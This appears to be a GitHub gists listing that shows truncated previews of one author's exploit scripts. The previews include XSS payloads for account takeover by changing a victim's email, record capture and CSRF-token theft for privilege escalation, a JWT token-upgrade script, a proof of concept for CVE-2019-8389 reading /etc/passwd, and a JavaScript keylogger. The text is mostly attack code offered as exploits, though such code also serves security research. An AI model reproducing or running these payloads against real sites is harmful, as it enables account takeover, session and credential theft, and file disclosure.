This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Exploit Code by Shawar Khan | |
var data_chunks = ''; | |
// Capturing Records from API | |
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
// Holds the records in as String | |
var allrecords = data; | |
// converting response to JSON |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// a Simple XSS exploit for email change | |
// Shawar Khan | |
var dark_window = window.open('https://www.target.com/settings'); | |
dark_window.addEventListener('load', | |
function exploit_run(){ | |
dark_window.document.body.getElementsByTagName('form')[0][2].value='[email protected]' // changes email | |
dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert(1337) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# A sample code that obtains a permanent JWT token when provided a temporary JWT token | |
import json | |
import requests | |
import sys | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
jwt_token=raw_input("Enter token > ") | |
exploit_url = "https://secure.site.com:443/aapi/v1/authentications/token" | |
exploit_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://www.site.com", "authorization": "Bearer "+str(jwt_token), "content-type": "application/json", "origin": "https://www.site.com", "Connection": "clos"} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Proof of concept for CVE-2019-8389 | |
# Exploit author: Shawar Khan | |
import sys | |
import requests | |
def usage(): | |
print "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var keys = ''; | |
document.onkeypress = function(e) { | |
var get = window.event ? event : e; | |
var key = get.keyCode ? get.keyCode : get.charCode; | |
key = String.fromCharCode(key); | |
keys += key;---- | |
} | |
window.setInterval(function(){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// XSS Exploit code for Privilege Escalation | |
// Author: Shawar Khan | |
var woot = document.createElement('html'); | |
fetch('https://vulnerablesite.com/settings',{credentials: 'include'}).then((resp) => resp.text()).then(function(data){ | |
woot.innerHTML=data; | |
var csrf_token = woot.getElementsByTagName('meta')[3]['content']; | |
privilege_escalate(); |